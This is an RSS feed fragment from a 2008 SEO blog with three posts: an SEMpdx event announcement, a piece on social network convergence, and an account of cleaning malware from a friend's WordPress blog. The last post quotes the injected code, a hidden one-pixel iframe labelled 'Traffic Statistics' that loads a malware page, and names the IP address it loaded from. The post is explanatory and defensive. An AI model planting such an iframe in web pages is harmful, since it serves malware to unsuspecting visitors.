			<wfw:commentRss>http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/feed/</wfw:commentRss>
	<enclosure url="http://flash.revver.com/player/1.0/player.swf?mediaId=892063&amp;affiliateId=150655" type="application/x-shockwave-flash" length="21789409" ></enclosure><media:player url="http://revver.com/watch/892063/flv/affiliate/150655"></media:player><media:content url="http://flash.revver.com/player/1.0/player.swf?mediaId=892063&amp;affiliateId=150655" duration="187" medium="video" type="application/x-shockwave-flash"></media:content>	</item>
		<item>
		<title>SEMpdx Featuring Matt McGee Tuesday</title>
		<link>http://www.pdxtc.com/wpblog/public-speaking/sempdx-featuring-matt-mcgee/</link>
		<comments>http://www.pdxtc.com/wpblog/public-speaking/sempdx-featuring-matt-mcgee/#comments</comments>
		<pubDate>Fri, 16 May 2008 23:25:42 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[Public Speaking]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=692</guid>
		<description><![CDATA[I&#8217;m honored to be a part of next tuesday evenings SEM Hotseat, because we have another guest star coming in from out of town to speak.
I&#8217;m going to go out on a limb and risk embarrassment by admitting that I did not recognize the name Matt McGee when Todd Mintz mentioned him about 18 months [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m honored to be a part of next tuesday evenings <a href="http://www.sempdx.org/Events/" target="_blank">SEM Hotseat</a>, because we have another guest star coming in from out of town to speak.</p>
<p>I&#8217;m going to go out on a limb and risk embarrassment by admitting that I did not recognize the name <a href="http://www.smallbusinesssem.com/about-small-business-sem/" target="_blank">Matt McGee</a> when <a href="http://www.sempdx.org/Events/Sponsor_Bios/Todd_Mintz/" target="_blank">Todd Mintz</a> mentioned him about 18 months ago in a discussion about &#8220;people we&#8217;d like to get to Portland some day&#8221; while we were at an <a href="http://www.sempdx.org/" target="_blank">SEMpdx</a> board meeting.  (Sorry Matt <img src='http://www.pdxtc.com/wpblog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Even Todds s mention of <a href="http://www.smallbusinesssem.com/" target="_blank">Small Busines SEM</a> didn&#8217;t directly ring a bell, although once I saw the graphics I recognized it as something I had indeed read before, and  was looking forward to meeting him.</p>
<p>Since hearing his name for the first time, I&#8217;ve seen Matt speak twice, and hung out with him at <a href="http://www.pdxtc.com/wpblog/google/matt-cutts-attacks-graywolf-after-ses-session/" target="_blank">SES San Jose</a>, at <a href="http://www.pdxtc.com/wpblog/conferences/pubcon-2007-nuggets/" target="_blank">Pubcon 2007</a> (was it twice?) at <a href="http://www.pdxtc.com/wpblog/technology-articles/smx-pre-show-party/" target="_self">SMX Advanced in Seattle</a> I think, and most recently here at Portlands&#8217;  <a href="http://www.pdxtc.com/wpblog/local-news/searchfest-2008-signup-is-live/" target="_blank">SearchFest 2008</a>.</p>
<p>Unfortunately for me, I did not get to hear his SearchFest presentation because I was presenting in the other room and I really wanted tobecause he had recently released something he called the <a href="http://www.smallbusinesssem.com/the-seo-success-pyramid/971/" target="_blank">SEO Success Pyramid</a>.</p>
<p>On my long-time list of &#8220;things I should do&#8221; was to create something like that , which provided a fantastic graphical overview of things you must do, complete with visuals. You can download a <a href="http://www.smallbusinesssem.com/img/pyramid-print.jpg" target="_blank">full color copy</a> here.</p>
<p>Next Tuesday is a rare opprtunity to meet Matt in person, and be treated to his knowledge and expertise in his presentation. Afterward, I&#8217;m honored to get to be on the panel with him, as we present another round of SEM Hot Seat.</p>
<p><strong>Where? When? How Much?</strong><br />
Next Tuesday night 5/20/08 at the Hotel deLuxe from 6 to 8pm, with the after hours party at&#8230; ?</p>
<p><a href="http://www.sempdx.org/Events/?launch_pg=EventPage&amp;launch_sel=1000156&amp;launch_pg_sp=true&amp;title=May+2008+Hot+Seat+%2B+Matt+McGee+%26amp%3B+The+SEO+Success+Pyramid" target="_blank">Find out more, and register here</a> and if you&#8217;re going, please drop a comment here, or be sure to say hello.</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/public-speaking/sempdx-featuring-matt-mcgee/">SEMpdx Featuring Matt McGee Tuesday</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/public-speaking/sempdx-featuring-matt-mcgee/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Social Convergence is Coming FAST</title>
		<link>http://www.pdxtc.com/wpblog/social-networking/social-convergence-is-coming-fast/</link>
		<comments>http://www.pdxtc.com/wpblog/social-networking/social-convergence-is-coming-fast/#comments</comments>
		<pubDate>Tue, 13 May 2008 21:42:21 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[Social Networking]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=690</guid>
		<description><![CDATA[Google, Facebook and Myspace have all made announcements this month that continue to lead us down the road of social convergence.
Advertising Age magazine just published an article called, &#8220;A Web-Wide social network&#8220;, and it&#8217;s really worth a read for clients that don&#8217;t get it many people that are in &#8220;social denial&#8221; and still think the [...]]]></description>
			<content:encoded><![CDATA[<p>Google, Facebook and Myspace have all made announcements this month that continue to lead us down the road of social convergence.</p>
<p>Advertising Age magazine just published an article called, &#8220;<a href="http://adage.com/digital/article?article_id=127012" target="_blank">A Web-Wide social network</a>&#8220;, and it&#8217;s really worth a read for <span style="text-decoration: line-through;">clients that don&#8217;t get it</span> many people that are in &#8220;social denial&#8221; and still think the answer to <strong><em>everything</em></strong> is going to be found in higher search engine rankings.  That&#8217;s very short sighted, in my opinion.</p>
<p>I think that if you really value your business over the years to come, and you have the foresight to look past next months SERPs and your sales figures, then it&#8217;s really helpful to understand how all this stuff is going to continue to morph your world as you know it.</p>
<p>At the <a href="http://www.pdxtc.com/wpblog/education/elite-retreat-2008-day-1/" target="_blank">Elite Retreat</a> in San Francisco, <a href="http://en.wikipedia.org/wiki/Matt_Mullenweg" target="_blank">Matt Mullenweg</a> of <a href="http://www.wordpress.org" target="_blank">Wordpress</a> and <a href="http://automattic.com/" target="_blank">Automattic</a> talked about where he thought things were going to go in the future, and what he envisioned for his company and for the evolution of Wordpress.</p>
<p>He explained that in the same way most of us began with AOL, (or in my case, Prodigy), he thought that today&#8217;s communities that we&#8217;re all joining, like <a href="http://www.myspace.com" target="_blank">MySpace</a> and <a href="http://www.facebook.com" target="_blank">Facebook</a>,  are all just temporary placeholders, until  better options become available.</p>
<p>True sharing of information and data becoming available across common websites and platforms (like Wordpress for example) is going to change the way our kids look at things.   Do you think they&#8217;re going to have the patience to sit down and fill out 35 profiles? Highly unlikely, wouldn&#8217;t you say?</p>
<p>In the lower right side of my blog you&#8217;ll see a social community called <a href="http://www.mybloglog.com" target="_blank">My Bloglog</a>, where people that choose to share and show their information will appear on my site with photos,   and I would appear on theirs, and it&#8217;s all pretty cool.  If anyone wants to find out more about a particular visitor, they can go to his profile and find it.</p>
<p>Another example or this sort of &#8220;interconnected sociality&#8221; that I&#8217;m using on this blog would be the <a href="http://en.gravatar.com/site/implement/wordpress" target="_blank">Gravatar plugin</a>, which stands for Globally Recognized Avatars.</p>
<p>This means that anyone who&#8217;s Gravatar member that comments on this blog instantly has their picture up here by their comment, allowing for true sharing of information.  Gravatar Accounts are free, and you can <a href="http://en.gravatar.com/site/signup" target="_blank">sign up for one here</a>.  There are no real profile pages there to speak of, but I would guess there&#8217;s something in the works.</p>
<p>The author of the Advertising Age story, Abbey Klassen, quotes another blogger talking about how &#8220;<a href="http://blogs.forrester.com/charleneli/2008/03/the-future-of-s.html" target="_blank">social networks will be like air</a>, saying this&#8230;</p>
<blockquote><p>&#8220;I thought about my grade-school kids, who in 10 years will be in the midst of social network engagement. I believe they (and we) will look back to 2008 and think it archaic and quaint that we had to go to a destination like Facebook or LinkedIn to &#8216;be social.&#8217;</p></blockquote>
<p>Even if you don&#8217;t have time to read the whole article, then I recommend you at least scroll to the part where it says &#8220;<a href="http://adage.com/digital/article?article_id=127012" target="_blank">Listen Up Marketers</a>&#8220;, because this is affecting our future faster than we think.</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/social-networking/social-convergence-is-coming-fast/">Social Convergence is Coming FAST</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/social-networking/social-convergence-is-coming-fast/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Virus in a Wordpress Post</title>
		<link>http://www.pdxtc.com/wpblog/viruses-and-scams/virus-in-a-wordpress-post/</link>
		<comments>http://www.pdxtc.com/wpblog/viruses-and-scams/virus-in-a-wordpress-post/#comments</comments>
		<pubDate>Fri, 02 May 2008 18:56:01 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[Viruses and Scams]]></category>

		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=684</guid>
		<description><![CDATA[I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer.  Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back.
Ultimately [...]]]></description>
			<content:encoded><![CDATA[<p>I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer.  Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back.</p>
<p>Ultimately he ended up having a local computer repair person come out, who cleaned up his system and a couple of hours and the problem went away., but today,we talked by phone, and he told me he got the warning again when he viewed his own blog.</p>
<p>I took a look at his blog and here&#8217;s what I saw -</p>
<p><a href="http://www.pdxtc.com/wpblog/wp-content/uploads/wp-virus-memo1.jpg"><img class="aligncenter size-full wp-image-686" title="wp-virus-memo1" src="http://www.pdxtc.com/wpblog/wp-content/uploads/wp-virus-memo1.jpg" alt="" width="374" height="294" /></a></p>
<p>Interesting! I recognize the IP address from the file that I couldn&#8217;t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from&#8230; it came from his own WordPress blog!</p>
<p>At that point I did little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else&#8217;s old posts.</p>
<p>&lt;!&#8211; Traffic Statistics &#8211;&gt; &lt;iframe height=&#8221;1&#8243; width=&#8221;1&#8243; frameBorder=&#8221;0&#8243; src=&#8221;http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp&#8221;&gt;&lt;/iframe&gt;&lt;!&#8211; End Traffic Statistics &#8211;&gt;</p>
<p>At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, <strong>it was found in 8 different posts! </strong>It was coming from  http://61.155.8.157/iframe/wp-stats.php and was a VBS Malware-gen</p>
<p>Luckily he&#8217;s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday?</p>
<p>The moral of the story? Moderate your new users, use a secure password, keep your Wordpress current (his was not) and watch out for strange e-mail addresses signing up as new users!</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/viruses-and-scams/virus-in-a-wordpress-post/">Virus in a Wordpress Post</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/viruses-and-scams/virus-in-a-wordpress-post/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
